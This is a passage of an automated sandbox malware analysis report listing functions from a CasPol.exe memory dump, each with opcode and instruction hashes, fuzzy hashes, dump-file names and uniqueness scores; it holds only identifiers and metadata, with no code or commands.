                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eda85d0d9f6270a18d55ac9b1d07fa3e16aeebc18dab74250424b89a29381e42
                                  • Instruction ID: 3ef0341d762c461d318a7e5d574082df345cd304c824c93091ba5d7140979272
                                  • Opcode Fuzzy Hash: eda85d0d9f6270a18d55ac9b1d07fa3e16aeebc18dab74250424b89a29381e42
                                  • Instruction Fuzzy Hash: B8017B71F101785BCF54A3B8841825E7BE59F886A4F154538E906D73C4FE2C8D0183C2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 203742D1 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f4175653eccd75470e37ac025183f3afd311495c60c02e475833c04e7e28064b
                                  • Instruction ID: bc622a69096206b7d41d2510fe38a692d6d62a94d9b5253a58bc52e88b16011f
                                  • Opcode Fuzzy Hash: f4175653eccd75470e37ac025183f3afd311495c60c02e475833c04e7e28064b
                                  • Instruction Fuzzy Hash: 11014531D05255AFCB02DB74D814EAD7FB0AF00210F0780EAE944CF2A2DA34DD449791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20374B20 Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 012efdc06d5eb8b91fb89305a6250058bb0580c5e7b1e3779c411224166e68f1
                                  • Instruction ID: ef5e19f91ec00992274882448e1881639875a8a345f76e60ae1cf9499085f747
                                  • Opcode Fuzzy Hash: 012efdc06d5eb8b91fb89305a6250058bb0580c5e7b1e3779c411224166e68f1
                                  • Instruction Fuzzy Hash: 62F04C36F14118A7D71496BD5C102DEBBFD9B88361F144039F905D7281DB75AD40C7D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037A780 Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fbd3c205356d00310a857e495da8e58c6be6643b77b25d917d339669f898d108
                                  • Instruction ID: f6d3d2f94695c8bb848ed582c077a41b216d5ef99d3864ed5761cf647e50fa2e
                                  • Opcode Fuzzy Hash: fbd3c205356d00310a857e495da8e58c6be6643b77b25d917d339669f898d108
                                  • Instruction Fuzzy Hash: 59019E74A08351AFCB09EB3DC09491C7BF1AFC0226B40891DE589CB3A0EA39A905CB13
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 203776A0 Relevance: .0, Instructions: 37COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9473ad2653ec65c11f010e69f8b7beb683c350c8ea3033a305cd5bb0ae4056b6
                                  • Instruction ID: a20e60443d65a1c8a16c0317b88bf0a8127915396c9d9ae5949994102fd6b9bb
                                  • Opcode Fuzzy Hash: 9473ad2653ec65c11f010e69f8b7beb683c350c8ea3033a305cd5bb0ae4056b6
                                  • Instruction Fuzzy Hash: 32F03C75E502688FDB10AFF5884828DBBB8EB883A1F554429E906D7244EB384945CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20373420 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 62fc10896a93367e6e11ba136d8fac28433d36b43540714f50f934dbdbfd06cd
                                  • Instruction ID: 0576c1f5c9ebf1970afe4b733d75a038d6b769cf06d5099cd2cabbea0b078c39
                                  • Opcode Fuzzy Hash: 62fc10896a93367e6e11ba136d8fac28433d36b43540714f50f934dbdbfd06cd
                                  • Instruction Fuzzy Hash: 2CF08232F001585BCB58DABED8555DFBBFAABC8250F11807ADA05E3240EE359D0487D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20375427 Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d7443b8af35848a3db154bf1ae728f9a860e5d17912e14411e04fc107c2fd60f
                                  • Instruction ID: 73e270b4495094e952a4c69bf4374f96945a8a23e953d95f96a87943044c86a6
                                  • Opcode Fuzzy Hash: d7443b8af35848a3db154bf1ae728f9a860e5d17912e14411e04fc107c2fd60f
                                  • Instruction Fuzzy Hash: CFE06D36F001188BCF05E7B8D44499DB3F2EB881143208068D50DE7261DE34AD028752
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20378807 Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a64c4811caa1f5b3362f33c33bbfe48026fd4e774b146678c120521544646b57
                                  • Instruction ID: 9634fcbf44909ac2251c95d21d4f365164b112fff5052580959a79e3bad61ad1
                                  • Opcode Fuzzy Hash: a64c4811caa1f5b3362f33c33bbfe48026fd4e774b146678c120521544646b57
                                  • Instruction Fuzzy Hash: 52E01236F016189BCF05E7B8D5949ADB3F1EF8C2157208079D50DE7365DE35AD028752
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037B677 Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a7b5368df729c779517bbe3dd46faa3da24fa9a89c8e855a27ed9619535ff020
                                  • Instruction ID: ad286b1c47b6e22fddd6c1e01fc9b5db9b847e4f46136cc8b75ef38888298f6c
                                  • Opcode Fuzzy Hash: a7b5368df729c779517bbe3dd46faa3da24fa9a89c8e855a27ed9619535ff020
                                  • Instruction Fuzzy Hash: AAE06D36F001188BCF05E7B8D5449ACB3F1EF881143208079D209E7265DE34AD028752
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20376E9F Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ae55f6ac331ca2572324bd569f341ce0e9eb1cb852a8b190d448ff7624dd7de5
                                  • Instruction ID: 831f8c911fe1d251bbe2b92d79c1838961925a73eb10397edd3082cf06349b9d
                                  • Opcode Fuzzy Hash: ae55f6ac331ca2572324bd569f341ce0e9eb1cb852a8b190d448ff7624dd7de5
                                  • Instruction Fuzzy Hash: B3E0ED36F005188BCF45E7B8D55499DB3F5AB881547208079D509E7265DE35AD028762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20378927 Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 18cd5e48faf461fb3d44606ebc304c1d01ed3763981a741acc8c88060ded5fdb
                                  • Instruction ID: 2471b0bf1b28a6e3dbfb7186ef363f8320baa7a7aed7d9ae0be7ef46b2750808
                                  • Opcode Fuzzy Hash: 18cd5e48faf461fb3d44606ebc304c1d01ed3763981a741acc8c88060ded5fdb
                                  • Instruction Fuzzy Hash: 45E09236F001188BCF05E7B8D5549ACB7F1EF8C21432080B8D10DE33A5DE34AD028752
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 203761BF Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 13860900afdeed81233f127956f83b66a397f9f21879f024fa2fc9aa22797d49
                                  • Instruction ID: 91bb2f4441dc2652effbd8ae834aa4008535d622257c2f7f26651d53a5249900
                                  • Opcode Fuzzy Hash: 13860900afdeed81233f127956f83b66a397f9f21879f024fa2fc9aa22797d49
                                  • Instruction Fuzzy Hash: ECE06D36F001188BCF05E7F8D54499CB3F1AB881143208079D509E3365DE34AE018752
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20376FBF Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0f65c508ddb7164409aea37c45fe797a932fdb33c5c72b06b6f83a330b3e2088
                                  • Instruction ID: 77024c5f6fd6c65b87ca0eca5296826ab537ec9f3d4cfbad3d8ecb2ba4f8b81a
                                  • Opcode Fuzzy Hash: 0f65c508ddb7164409aea37c45fe797a932fdb33c5c72b06b6f83a330b3e2088
                                  • Instruction Fuzzy Hash: F6E0ED36F005188BCF05E7B8D4449ADB3F1AB881147208069D509E7265EE35AE019762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 203783D7 Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff656afac5c453b783b362105ea18645a3a2459f7b76c3aa66eb8ee51f83d1a3
                                  • Instruction ID: 06e7652d21673ae3134f69eedf09043b9b0995726399f1be0970e56ecb31ba33
                                  • Opcode Fuzzy Hash: ff656afac5c453b783b362105ea18645a3a2459f7b76c3aa66eb8ee51f83d1a3
                                  • Instruction Fuzzy Hash: BBE09236F001188BCF05E7B8D4449ACB3F6EF8C2243208079D50DE3361EE34AD028762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037F7D7 Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9370af7151d2ec9b87f8aafd08888b73a564a348260dc929aeebe6c611421113
                                  • Instruction ID: e5567a5cf2a9ab18e36fbc086727b159da0039d7c7b3f4d5686b4e077fadfc0d
                                  • Opcode Fuzzy Hash: 9370af7151d2ec9b87f8aafd08888b73a564a348260dc929aeebe6c611421113
                                  • Instruction Fuzzy Hash: 64E0ED36F005189BCF05E7B8E5549ADB3F1EF881247208069D509E7265EE35AD028B52
                                  Uniqueness

                                  Uniqueness Score: -1.00%